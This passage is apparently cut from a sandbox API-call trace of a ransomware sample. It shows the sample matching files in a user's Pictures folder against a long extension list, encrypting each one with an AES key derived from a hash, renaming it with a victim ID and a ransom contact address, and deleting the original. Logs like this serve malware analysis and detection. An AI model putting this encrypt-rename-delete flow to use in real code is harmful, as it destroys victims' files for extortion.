pt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".png") returned=".png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0195.892] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0195.892] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0195.892] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0195.895] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x38a5, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x38a5, lpOverlapped=0x0) returned 1
	[0195.897] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.898] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcabc0) returned 1
	[0195.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.900] CryptCreateHash (in: hProv=0xfcabc0, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0195.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0195.900] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0195.900] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.067] CryptDeriveKey (in: hProv=0xfcabc0, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0196.067] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.068] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x38a5, dwBufLen=0x38a5 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x38b0) returned 1
	[0196.068] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.069] RtlMoveMemory (in: Destination=0xfe0a30, Source=0xfdd180, Length=0x38a5 | out: Destination=0xfe0a30) 
	[0196.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.069] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfe0a30*, pdwDataLen=0x18bc0c*=0x38a5, dwBufLen=0x38b0 | out: pbData=0xfe0a30*, pdwDataLen=0x18bc0c*=0x38b0) returned 1
	[0196.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.069] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0196.069] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.070] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0196.070] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.070] CryptReleaseContext (hProv=0xfcabc0, dwFlags=0x0) returned 1
	[0196.070] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.070] GetVolumeInformationA (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x18bc28, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x18bc28*=0xc287f38, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0196.071] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.071] GetUserNameA (in: lpBuffer=0x18bb0c, pcbBuffer=0x18bc24 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x18bc24) returned 1
	[0196.072] wsprintfW (in: param_1=0x18bc40, param_2="%s.id_%x%x_email_enc2@dr.com_.scl" | out: param_1="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png.id_c287f3826d6e218_email_enc2@dr.com_.scl") returned 86
	[0196.072] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png.id_c287f3826d6e218_email_enc2@dr.com_.scl" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png.id_c287f3826d6e218_email_enc2@dr.com_.scl"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c0
	[0196.074] WriteFile (in: hFile=0x2c0, lpBuffer=0xfe0a30*, nNumberOfBytesToWrite=0x38b0, lpNumberOfBytesWritten=0x18c068, lpOverlapped=0x0 | out: lpBuffer=0xfe0a30*, lpNumberOfBytesWritten=0x18c068*=0x38b0, lpOverlapped=0x0) returned 1
	[0196.078] CloseHandle (hObject=0x2c0) returned 1
	[0196.078] CloseHandle (hObject=0x384) returned 1
	[0196.078] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png")) returned 1
	[0196.083] DeleteFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\nakuksj-6.png")) returned 0
	[0196.083] FindNextFileW (in: hFindFile=0xfb9830, lpFindFileData=0x18c8b4 | out: lpFindFileData=0x18c8b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e7764a0, ftCreationTime.dwHighDateTime=0x1d9714e, ftLastAccessTime.dwLowDateTime=0x94a20120, ftLastAccessTime.dwHighDateTime=0x1d971d8, ftLastWriteTime.dwLowDateTime=0x94a20120, ftLastWriteTime.dwHighDateTime=0x1d971d8, nFileSizeHigh=0x0, nFileSizeLow=0x14eb9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pfrh0 ehmTA6.jpg", cAlternateFileName="PFRH0E~1.JPG")) returned 1
	[0196.083] lstrcmpW (lpString1="Pfrh0 ehmTA6.jpg", lpString2="..") returned 1
	[0196.083] lstrcmpW (lpString1="Pfrh0 ehmTA6.jpg", lpString2=".") returned 1
	[0196.083] lstrcpyW (in: lpString1=0x18cb04, lpString2="C:\\Users\\RDhJ0CNFevzX\\Pictures\\" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\"
	[0196.083] lstrcatW (in: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\", lpString2="Pfrh0 ehmTA6.jpg" | out: lpString1="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Pfrh0 ehmTA6.jpg") returned="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Pfrh0 ehmTA6.jpg"
	[0196.084] lstrlenW (lpString="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Pfrh0 ehmTA6.jpg") returned 47
	[0196.084] LoadLibraryA (lpLibFileName="user32.dll") returned 0x76950000
	[0196.084] CharLowerBuffW (in: lpsz="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Pfrh0 ehmTA6.jpg", cchLength=0x2f | out: lpsz="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg") returned 0x2f
	[0196.084] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.084] StrStrW (lpFirst="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg", lpSrch="help_decrypt_your_files") returned 0x0
	[0196.084] lstrcpyW (in: lpString1=0x18c6ac, lpString2="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg" | out: lpString1="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg") returned="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg"
	[0196.084] lstrlenW (lpString="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg") returned 47
	[0196.085] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.085] StrStrW (lpFirst=".jpg", lpSrch=".") returned=".jpg"
	[0196.085] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0196.085] StrStrW (lpFirst=".3g2.3gp.7z.ab4.ach.adb.ads.ait.al.apj.asf.asm.asp.asx.back.bank.bgt.bik.bkf.bkp.bpw.c.cdf.cdr.cdx.ce1.ce2.cer.cfp.class.cls.cmt.cpi.cpp.craw.crt.crw.cs.csh.csl.csv.dac.dbr.ddd.der.des.dgc.dng.drf.k2p.dtd.dxg.ebd.eml.exf.ffd.fff.fh.fhd.fla.flac.flv.fm.gray.grey.grw.gry.h.hpp.ibd.iif.indd.java.key.laccdb.lua.m.m4v.maf.mam.mar.maw.mdc.mde.mfw.mmw.mp4.mpg.mpp.mrw.mso.ndd.nef.nk2.nsd.nsg.nsh.nwb.nx1.nx2.odc.odf.odg.odp.ods.oil.one.oth.otp.ots.p12.p7b.p7c.pas.pat.pbo.pcd.pct.pem.php.pip.pl.plc.pot.potm.potx.ppam.pps.ppsm.ppsx.prf.psafe3.pspimage.pub.puz.py.qba.qbw.r3d.raf.rar.rat.raw.rm.rwz.sas7bdat.say.sd0.sda.snp.srf.srt.st4.st5.st6.st7.st8.stc.std.sti.stx.sxc.sxi.sxm.vob.vsx.vtx.wav.wb2.wll.wmv.wpd.x11.xla.xlam.xlb.xlc.xll.xlm.xlr.xlsb.xlt.xltm.xltx.m4a.wma.d3dbsp.xlw.xpp.xsn.yuv.zip.sie.unrec.scan.sum.t13.t12.qdf.tax.pkpass.bc6.bc7.sidn.sidd.mddata.itl.icxs.hvpl.hplg.hkdb.mdbackup.syncdb.gho.cas.wmo.itm.sb.fos.mov.vdf.ztmp.sis.sid.ncf.menu.layout.dmp.blob.esm.vcf.vtf.dazip.fpk.mlx.kf.iwd.vpk.tor.psk.rim.w3x.fsh.ntl.arch00.lvl.snx.cfr.ff.vpp_pc.lrf.m2.mcmeta.vfs0.mpqge.db0.dba.rofl.hkx.bar.upk.das.litemod.asset.forge.bsa.apk.re4.lbf.slm.epk.rgss3a.pak.big.wallet.wotreplay.xxx.desc.m3u.js.rb.1cd.dbf.dt.cf.cfu.mxl.epf.kdbx.vrp.grs.geo.st.pff.mft.efd.3dm.3ds.rib.ma.sldasm.sldprt.max.blend.lwo.lws.m3d.mb.obj.x.x3d.movie.byu.c4d.fbx.dgn.dwg.4db.4dl.4mp.abs.accdb.accdc.accde.accdr.accdt.accdw.accft.adn.a3d.adp.aft.ahd.alf.ask.awdb.azz.bdb.bnd.bok.btr.bak.backup.cdb.ckp.clkw.cma.daconnections.dacpac.dad.dadiagrams.daf.daschema.db.db-shm.db-wal.db2.db3.dbc.dbk.dbs.dbt.dbv.dbx.dcb.dct.dcx.ddl.df1.dmo.dnc.dp1.dqy.dsk.dsn.dta.dtsx.dxl.eco.ecx.edb.emd.eql.fcd.fdb.fic.fid.fm5.fmp.fmp12.fmpsl.fol.fp3.fp4.fp5.fp7.fpt.fzb.fzv.gdb.gwi.hdb.his.ib.idc.ihx.itdb.itw.jtx.kdb.lgc.maq.mdb.mdbhtml.mdf.mdn.mdt.mrg.mud.mwb.s3m.myd.ndf.ns2.ns3.ns4.nsf.nv2.nyf.oce.odb.oqy.ora.orx.owc.owg.oyx.p96.p97.pan.pdb.pdm.phm.pnz.pth.pwa.qpx.qry.qvd.rctd.rdb.rpd.rsd.sbf.sdb.sdf.spq.sqb.stp.sql.sqlite.sqlite3.sqlitedb.str.tcx.tdt.te.teacher.trm.udb.usr.v12.vdb.vpd.wdb.wmdb.xdb.xld.xlgc.zdb.zdc.cdr3.ppt.pptx.1st.abw.act.aim.ans.apt.asc.ascii.ase.aty.awp.awt.aww.bad.bbs.bdp.bdr.bean.bib.bna.boc.btd.bzabw.chart.chord.cnm.crd.crwl.cyi.dca.dgs.diz.dne.doc.docm.docx.docxml.docz.dot.dotm.dotx.dsv.dvi.dx.eio.eit.email.emlx.epp.err.etf.etx.euc.fadein.faq.fbl.fcf.fdf.fdr.fds.fdt.fdx.fdxt.fes.fft.flr.fodt.fountain.gtp.frt.fwdn.fxc.gdoc.gio.gpn.gthr.gv.hbk.hht.hs.htc.hwp.hz.idx.iil.ipf.jarvis.jis.joe.jp1.jrtf.kes.klg.knt.kon.kwd.latex.lbt.lis.lit.lnt.lp2.lrc.lst.ltr.ltx.lue.luf.lwp.lxfml.lyt.lyx.man.map.mbox.md5txt.me.mell.min.mnt.msg.mwp.nfo.njx.notes.now.nwctxt.nzb.ocr.odm.odo.odt.ofl.oft.openbsd.ort.ott.p7s.pages.pfs.pfx.pjt.plantuml.prt.psw.pu.pvj.pvm.pwi.pwr.qdl.rad.readme.rft.ris.rng.rpt.rst.rt.rtd.rtf.rtx.run.rzk.rzn.saf.safetext.sam.scc.scm.scriv.scrivx.scw.sdm.sdoc.sdw.sgm.sig.skcard.sla.slagz.sls.smf.sms.ssa.strings.stw.sty.sub.sxg.sxw.tab.tdf.text.thp.tlb.tm.tmd.tmv.tmx.tpc.trelby.tvj.txt.u3d.u3i.unauth.unx.uof.uot.upd.utf8.unity.utxt.vct.vnt.vw.wbk.wcf.webdoc.wgz.wn.wp.wp4.wp5.wp6.wp7.wpa.wpl.wps.wpt.wpw.wri.wsc.wsd.wsh.wtx.xbdoc.xbplate.xdl.xlf.xps.xwp.xy3.xyp.xyw.ybk.yml.zabw.zw.2bp.0.36.3fr.411.73i.8xi.9png.abm.afx.agif.agp.aic.albm.apd.apm.aps.apx.artwork.arw.asw.avatar.bay.blkrt.bm2.bmp.bmx.bmz.brk.brn.brt.bss.bti.c4.cal.cals.can.cd5.cdc.cdg.cimg.cin.cit.colz.cpc.cpd.cpg.cps.cpx.cr2.ct.dc2.dcr.dds.dgt.dib.djv.dm3.dmi.vue.dpx.wire.drz.dt2.dtw.dvl.ecw.eip.erf.exr.fal.fax.fil.fpos.g3.gcdp.gfb.gfie.ggr.gif.gih.gim.gmbck.gmspr.spr.scad.gpd.gro.grob.hdr.hpi.i3d.icn.icpr.iiq.info.int.ipx.itc2.iwi.j.j2c.j2k.jas.jb2.jbig.jbig2.jbmp.jbr.jfif.jia.jng.jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim", lpSrch=".jpg") returned=".jpg2.jps.jpx.jtf.jwl.jxr.kdc.kdi.kdk.kic.kpg.lbm.ljp.mac.mbm.mef.mnr.mos.mpf.mpo.mrxs.myl.ncr.nct.nlm.nrw.oc3.oc4.oc5.oci.omf.oplc.af2.af3.ai.art.asy.cdmm.cdmt.cdmtz.cdmz.cdt.cgm.cmx.cnv.csy.cv5.cvg.cvi.cvs.cvx.cwt.cxf.dcs.ded.design.dhs.dpp.drw.dxb.dxf.egc.ep.eps.epsf.fh10.fh11.fh3.fh4.fh5.fh6.fh7.fh8.fif.fig.fmv.ft10.ft11.ft7.ft8.ft9.ftn.fxg.gdraw.gem.glox.gsd.hpg.hpgl.hpl.idea.igt.igx.imd.ink.lmk.mgcb.mgmf.mgmt.mt9.mgmx.mgtx.mmat.mat.otg.ovp.ovr.pcs.pfd.pfv.pl.plt.vrml.pobj.psid.rdl.scv.sk1.sk2.slddrt.snagitstamps.snagstyles.ssk.stn.svf.svgz.sxd.tlc.tne.ufr.vbr.vec.vml.vsd.vsdm.vsdx.vstm.stm.vstx.wpg.vsm.vault.xar.xmind.xmmap.yal.orf.ota.oti.ozb.ozj.ozt.pal.pano.pap.pbm.pc1.pc2.pc3.pcd.pdd.pe4.pef.pfi.pgf.pgm.pi1.pi2.pi3.pic.pict.pix.pjpeg.pjpg.pm.pmg.pni.pnm.pntg.pop.pp4.pp5.ppm.prw.psdx.pse.psp.pspbrush.ptg.ptx.pvr.px.pxr.pz3.pza.pzp.pzs.z3d.qmg.ras.rcu.rgb.rgf.ric.riff.rix.rle.rli.rpf.rri.rs.rsb.rsr.rw2.rwl.s2mv.sai.sci.sct.sep.sfc.sfera.sfw.skm.sld.sob.spa.spe.sph.spj.spp.sr2.srw.ste.sumo.sva.save.ssfn.t2b.tb0.tbn.tex.tfc.tg4.thm.thumb.tjp.tm2.tn.tpi.ufo.uga.usertile-ms.vda.vff.vpe.vst.wb1.wbc.wbd.wbm.wbmp.wbz.wdp.webp.wpb.wpe.wvl.x3f.y.ysp.zif.cdr4.cdr6.cdrw.jpeg.djvu.pdf.ddoc.css.pptm.raw.cpt.jpg.jpe.jp2.pcx.pdn.png.psd.tga.tiff.tif.hdp.xpm.ai.ps.wmf.emf.ani.apng.flc.fb2.fb3.fli.mng.smil.svg.mobi.swf.html.xls.xlsx.xlsm.xhtm.mrwref.xf.pst.bd.tar.gz.mkv.xml.xmlx.dat.mcl.mte.cfg.mp3.qbi.qbr.cnt.v30.qbo.lgb.qwc.qbp.aif.qby.1pa.qpd.set.nd.rtp.qbwin.log.qbbackup.tmp.temp1234.qbt.qbsdk.syncmanagerlogger.ecml.qsm.qss.qst.fx0.fx1.mx0.fpx.fxr.fim"
	[0196.086] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0196.086] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0196.086] CreateFileW (lpFileName="c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\pfrh0 ehmta6.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x384
	[0196.093] ReadFile (in: hFile=0x384, lpBuffer=0xfdd180, nNumberOfBytesToRead=0x14eb9, lpNumberOfBytesRead=0x18c060, lpOverlapped=0x0 | out: lpBuffer=0xfdd180*, lpNumberOfBytesRead=0x18c060*=0x14eb9, lpOverlapped=0x0) returned 1
	[0196.096] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.097] CryptAcquireContextW (in: phProv=0x18bc10, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18bc10*=0xfcb5d8) returned 1
	[0196.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.099] CryptCreateHash (in: hProv=0xfcb5d8, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x18bc14 | out: phHash=0x18bc14) returned 1
	[0196.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.099] CryptHashData (hHash=0xfb98f0, pbData=0xfc0b90, dwDataLen=0x10c, dwFlags=0x0) returned 1
	[0196.099] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.100] CryptDeriveKey (in: hProv=0xfcb5d8, Algid=0x6610, hBaseData=0xfb98f0, dwFlags=0x1, phKey=0x18bc18 | out: phKey=0x18bc18*=0xfb9bf0) returned 1
	[0196.100] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.100] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x18bc2c*=0x14eb9, dwBufLen=0x14eb9 | out: pbData=0x0*, pdwDataLen=0x18bc2c*=0x14ec0) returned 1
	[0196.103] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0196.103] RtlMoveMemory (in: Destination=0xff2048, Source=0xfdd180, Length=0x14eb9 | out: Destination=0xff2048) 
	[0196.103] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.103] CryptEncrypt (in: hKey=0xfb9bf0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xff2048*, pdwDataLen=0x18bc0c*=0x14eb9, dwBufLen=0x14ec0 | out: pbData=0xff2048*, pdwDataLen=0x18bc0c*=0x14ec0) returned 1
	[0196.106] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.107] CryptDestroyKey (hKey=0xfb9bf0) returned 1
	[0196.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.107] CryptDestroyHash (hHash=0xfb98f0) returned 1
	[0196.107] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0196.107] CryptReleaseContext (hProv=0xfcb5d8, dwFlags=0x0) returned 1
	[0196.107] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
